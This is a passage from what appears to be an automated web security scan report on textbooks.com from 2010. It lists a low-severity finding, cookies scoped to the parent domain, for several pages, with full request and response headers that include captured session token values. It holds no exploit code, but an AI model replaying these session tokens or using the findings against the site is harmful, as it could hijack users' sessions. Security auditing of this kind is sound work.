Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=IUNU%2FCVo3e7OAi3monE7uCKuNyCjn5xqOcaCW%2FojlApqnsXvSUcUMOZl%2Fl8xqqJr9Y3Dw8PP2JICBiWM7Ak%2BHP9rNIzm%2FMoylv%2FVwIAvI140oSpVSBxpIYvn92zyqpwSPPrcGtTaexBsW5Chmrif7zJaJoACHS2EIIySIqSt2I0NV8n6nnhIPVo8RX%2FrUG2RBrQHWwa0R19c009fjgbYxmyPo%2B5NOetV8THje7FeH13zQI39TXIB9TIyBHQ1EB%2BXWVXQac0Ey45mygp%2Bt7iYST4atUOq%2Fl3U44mEfbjIRjKtyI1D%2BiXOv9w5IZLdyvQZjOnzlUvwem93ygYrsFZW5%2FjvekOHJEznxLWsbtI4zRDPLJZ66QRiax%2FUhM9TxI7Xf0lZ5L%2F10lsV7GmSA4J25Z1gGeA928TgjRf2T63g80GqRaftVJIA%2FHBd9QzmkHN%2FKa%2ByoG4hkOrtT2hOEaKk6Ke6Rj27ja%2BdHdb0GNwnZPZE1m5xvH5SZVFXHwBzTMv1BREEsKcH%2B0mWwEZ3faoX8ra5YYektLjd%2BnRRsiopnGuR2xNXAACIXxWM672Qarg82sA1Fesrsho3iH22CDsDaKzDZ3B0oF%2FJ%2FaiFWbkfgelNPYjkfOQ4sqgctsGj7%2FK1lub%2FdkTrgB5oX%2FemQDN53IOQAxOhT7OGDhDp%2Bt%2B1CL0ohB%2B4hN9Vye%2FHFzmjXj6v5r3L9GF24tjgLNgDc%2FthzEZHZrxBdWtHozBVeAaZHgKq2WQ8Et5pELcH8OR%2BaqH%2F6BEMH1NIsd9T9%2Bau52CbsvVuOVsXJuhbBFT4okHAFCKjUFtlFrqfP9ykwm0uU71U2eajIphvFjf5X%2F9qtHeimMNXB8MhOYfOJRTJ01R%2FuSqw%2B245%2BAYRvEGBePAT%2BNnXSLXzIhg1cMqYrmQED%2BFpNjdu7eIgMaByUCXYhYHTrpoKhnPZAV5%2FuevXai0LvCMC1QjNWN4e8EA788UJBDoacNBhtUTF1%2BFMUrf6hvzZ51cjKf%2FUrQ3U7TgH9hux7bP3D6ZdSNv3FJKyprgWHoHR4x82%2BiDXUckV42NLHqWtt9ki4EFpJN2PGZxxEVeMkakM9da9HHZDo%2BU4Lg5J%2FaZJ2aEDRyg8o4R9rmdnDC4WtwQ54hev%2FWEMylzZNyqIOqPjsyY2LrB3Akg0Xd3maRkS8%2Fs9Au3VfJ8SJnOLJoZVzmIaaL%2Bv2Pj5pIIhWLkUmR04UQ%2Fza3XsvHyiP0ryCWvhE4SwyTOBBkCL6PvopHc4qfH0cCTmYwqL7opoI6Q%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=O7IQMANG3VCTdpnhVXo%3D; expires=Mon, 26-Dec-2011 13:51:59 GMT; path=/; domain=.textbooks.com
Content-Length: 35362


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.2. http://www.textbooks.com/Author/Peter_Vorderer.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Author/Peter_Vorderer.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Author/Peter_Vorderer.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=H01U36MSp2dZuiYXGjisaivMdUBgZaLhl4%2FnJGGLIw0eZsY%2BGwK8RLrTb0Mn7MlBojEDK1pCuEjD%2F4SI1V9tIZrtItqjVkwmuFxeNkXpLLphXwnqkLiewlO0zWNUBkZlheVezHXMZgLZQPEWG3uJFdFa3R4AaBmosszdTLbwSBeRufTyT7DmLHTmY5h6yDHjYtt9JPgoWW%2FdSnKXM5u6A%2Fmt5dpfuTcdZfhJZA4rRlDnz9vC64xjS%2FPUCLqvzcw2TSUoiwIX1WvWuTj6hZY3d8TPab0WekS2SMiB7c9KOZyuMA9rj9ruOpqDfOtb7FiwqPIuR7izBEvzhlkQibRlyYgD4xTcLczw5s4y6SdQa%2F5Y%2FMSdfq9y%2BlT8EdOSPVEFadz%2FZkz845z0jGCXfRvlQb9ey0nqEPZerPKAXaIQLq1eNTMm5k9fzdLUX4Z9AAbLP9rYik51SDvDcnT7QO6VgSwypJVzXF42pZsH16snj3Ir4DnTmfHkJ9XdOLa%2BASkH6jqLSjeR0uxlVn46oNiDql7qqsU1TlHw2uNhppz8tb7oP1k%2FyH0W5bm1%2FDYOPHSIfMc4XUcb3f4K6i5t6FKQ2Tv0jiPt76gJBjd3WvIPTrcFpbBVTcVSu7Qd4G5uq%2FQMzl7heE3aBbybUdd68hi3MwSdKlg2g%2BQBIp%2FEV%2B0hZNa3akd7Lcag7Rp9Yy%2FHSkg2efBneciWE5914OiJ5sXY874FeMSVGnZrMoVvoztI3T5RlxjY9lZ5c4aQ3Q4W5D6t3uW911wm10TGCKjQxdujRHUFOSNFmQoj0CGYVcObVqLQFJ4S7vQrbI%2Ffdloa5%2B1NpgMYC5ixSIG4e6N7BqyT97eESy8SEA3j%2FJd%2F4OX1BXmHG58Q74HA8NTsKLrIgiolu871V9eSwRT7J6fGx54s%2BtKQP1r5ma0z1xFYcGyzaztJaPwBXtDCWrXqjZ9AexjzaIE5GLWoo7bf0yAIlFjWiVLnX2FPyxKOcxJE3hP%2B%2FVe76wnw2DHFPjNKbzLGUdJwBRdhV4jSaYdtscek5Ei4058GEgjJieD4NTiFL97OuABKvt0pBc0cRTBH6rbzLmVnr46QCPHLgLxBFOBXgDUUxDKYGlBnppd5bSMp3a0wgyYHuRd%2BPl1PWlRO8761qzLi5maBr%2BIM9eh2%2B4cfNshfqxPP5bO2NXqaEkF179xjjC5LpJZIrrlhBNkEcmab4qfvz6XhhMkl6PO3flcm9JSwxSBzGJNKcf1Wkyh2U7HuJbBJtYzN9xU6Tv%2BT4Pc%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=C0ot1rm4AVmqgN2OAk8%3D; expires=Mon, 26-Dec-2011 13:53:04 GMT; path=/; domain=.textbooks.com
Content-Length: 48376


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- START OF PAGE 12/26/20
...[SNIP]...

3.3. http://www.textbooks.com/BooksDescription.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /BooksDescription.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BooksDescription.php?BKN=756724&SBC=CB0&mcid=XCS-Become-9780805853223-U&utm_medium=shoppingengine&utm_term=9780805853223U&utm_source=become HTTP/1.1
Host: www.textbooks.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:44:21 GMT
Connection: close
Set-Cookie: BNG=deleted; expires=Sat, 26-Dec-2009 13:44:19 GMT; path=/
Set-Cookie: 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; expires=Tue, 25-Jan-2011 13:44:20 GMT; path=/
Set-Cookie: TBSESSION=JrxP960N4HQ7mADzP1D7yqF0fNX%2BR0clTNCcjEKeryEMxNgKFUiFfkJvGOkcESM4s6u2M9wn4Mp0eRxMk2zoO7gpAukCPAS47mKQ7RdsfA6qfnrndZzf40lVm5GwdoII1X%2FOU6gdYzFRpWRB72Nh2BnyY77V7GlCiIC740scKoPvcPhyClreKV%2FjFSfPbdPqRfrQIBVLVKbto66IzMi6Mu3h%2FcDrsNX5UudWvpdhNY5%2Bncv%2F3CGwzVpwrbWcvpYK%2FKEubIHcYREUgPGOaTiojy%2FzUQ5bVgATj5FVT%2FTggUeshMviDyO8%2FDi2u4i4WZXO37DRyxznP7W1AxSZMCbtdz%2F6leTHX25wztUnoW5v6PxdgaKOgvHoy8zT26FS1ub4D9yxxpu4RrCJCxpEtfckl4TaucHvWO8QetcLcTp58oqeH0kUQ0aftAWwWK9zgJ1%2FwxNppv63COoFEfLhXopwvkWAyPmrJnDadLs91HLXpfaEvPBxOeAMXAmaP6wvZd0Rutsh7ubiGuFDbfsQcnRXckp3Zv4dBZsXrQq%2FAR6oX9jY762kpGuBc%2Fzig8kEdzmoIr6ppRreuRZflmL8KLLYOI%2B5s7dZ915IMDlggsZX4x1AD90Te%2BdaYyA73n%2Fm%2F1JGY283ScqT1f3fb80S8M6QEhgTEGa5LuNLs7S9ZSIQUGje4CYjCBJhxFI7uvkERtdhpoAxBfflkxVFj9xgQu0k2Z0zP24cM42vrPcRirLWAGvu0XPtgwx1YrQTrCBy9vdjdAHgSKzeBSMj2iVkd9aZuxoe8HUCfENbBPaaVFrlSBRCSPoz2X%2FedX%2B%2Fr%2FDmYkSD0D%2B1XybKRtasGTxPpNKp8Up%2Ft1naz8ZzaU5qKJ0OCkv3CKnmKtpTnhVOXiwg8%2FbFpVCNtkIj80WoNu9DEH6xLC4nve%2BcnKGkJVjfBm59WWI%2FxiLbKLojbK5rMoOt1IxpUoEDCajy5tR3u10meUmFUBje4VEWr7MMYmM7DucLesIzbcluQJdVpbBmZLYD2GLQ%2F7LWzgGhPCkj1pFYFtCm7oP3g45E9TZvFomoyJsHA0AVB%2BOF%2FjFPfEDh%2B50F%2BAUTj%2FWcIMn2vB%2BYT5MGse7JqPTvh7rgkKPsDWozH63rLzr6RTK4i%2Fh85gX4%2Ft3RAFxG8LtSmX44znQBBzNc32eNyKjqwj8ZaOpV9gXkK2%2BJhJ6SP3cMOJc%2B96CRisy7mmFSE5odQO5DJNaS5iIs3Brs3B5hjFpsZI7dZg9F%2BJ9w%2FT3qfQlIkUWHsMGOmz0lAbK%2BMyzWAOj9tznYP8QeuQPB6Q%3D%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=mwIrsiZ%2BRpZU9lHz%2BTc%3D; expires=Mon, 26-Dec-2011 13:44:20 GMT; path=/; domain=.textbooks.com
Set-Cookie: TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; expires=Mon, 26-Dec-2011 13:44:21 GMT; path=/; domain=.textbooks.com
Content-Length: 55234


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <meta name="keyw
...[SNIP]...

3.4. http://www.textbooks.com/BuyBack-Search.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /BuyBack-Search.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BuyBack-Search.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BBVC=deleted; expires=Sat, 26-Dec-2009 13:53:01 GMT
Set-Cookie: BBVC=deleted; expires=Sat, 26-Dec-2009 13:53:01 GMT
Set-Cookie: TBSESSION=tDL1W8D7gaCS7jzI6Dzjj4VxTEZdKx54wiBKsRJp2y62pibSI8t34OV5LbMNc5J%2BIDh%2F7cXjxIkPCea1HFWQwg4kkvAf5y%2FWIMqnMEOYq5gwfo0nT%2Br3%2B0Mr2U51pNHYBL7L00QV1Pks3Wo83iqXa%2B7yPEmc%2B%2Flgv%2FadwiXTLDJFUr0vnlwokBSjUmrzJgmZryaXHiFLddpXygKYaW023Yg9OSvJi7Hu%2FMNV1OmaPldRr8NvAwN2D0XT49iDMa%2Bf2xtP6Spo7VHCWA6XYz7ITxlt3GaGxxIIo5tXwc5OpTrHqXKdZAdne2jrWU0C9uquUNG68ReG4eYsffCNTtp0n5TG45l11y3WH%2BJEt7bU0WSXGGXcsMXGGjMQO%2BiGd9q7M5Qz3rCO1ddl2dPVIFEGnDI46PKJPARVjZ7nWLgO03rHvHQgwDOpESSmNx6s2uOMe2EUAO%2BEOFsW5KXx7reamIunceN4S%2BcnJTYQ0FH2ipMMSxfFpIidrjTV8mmp0bf7jLgecSzagN1fHJx5fRhv%2BmeNxmxBvAKYx1W3Lrr2iwld3q2%2Fci%2FPFnpICPJNUU22bWGkl8z%2FohGLs8oosTpgzAmuYGE3dpvbdIDYNBpsBJYY8%2Bl%2Bfi0gbtnbrbxa1vAkZh04aZMtNdXM8EfztGRlpwB%2B5UN1%2BleUU7v%2FnRvQHz9N48UQiOFcB5WQ3y9rxlRU8erTcckrQ2ok7D4S4tulcBOAuNzSkUak48NLzAEQubR%2BSlReGPs0OFk3ga0Ak8Ie75nTGmuPNwq7iuUuzO1hlxPJkrpdQ%2Be9cdGQRwnrskQvh2JvhGmyj3xPJ7IMFxhV%2Ftdv%2BKn62YFQ50%2FVDLanFjHYkhhICDrnx1gf0b%2F14Sh0tZPSmceYUkEjlZreJ3mdp80vc8jooDDhCSXpeJO0OUyhzaXX%2FrptrGcvsef07pvCuUku%2FuJZxotQmum0fs7Lpsg3%2FTiPv0lEeieSUA%2FFMlJxy%2BiCrl4cD23thJbSkwqHTKthbb9oXiViEvHpLerRSsI4XSIuUWaE2IUurstFcJkUY7ng4MGWzRUSDioyeDe3MFN0qlXJxlPhOgjHsM%2BeLri8m%2BBvkXPnMsnozg7j6h1J0BVLRtD7kvlRtQpJ76xS1r0GGMb4cmhZcd%2BrrvLN8CK%2FXqu6P6aQt6T9m7DlM68gUlh%2FR1uSHpCMBltVrtitvz4kN95S8TT9BFfJEEnu%2FnImW0wLUwiQRhHxs20WtHAuk4vQoQYH4MjtdFs3sQVmMcQ3T8UDSK2r2JU%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=0COxkJ9ZgoIrUuXJTYo%3D; expires=Mon, 26-Dec-2011 13:53:02 GMT; path=/; domain=.textbooks.com
Content-Length: 35930


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

3.5. http://www.textbooks.com/Cart.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Cart.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Cart.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; 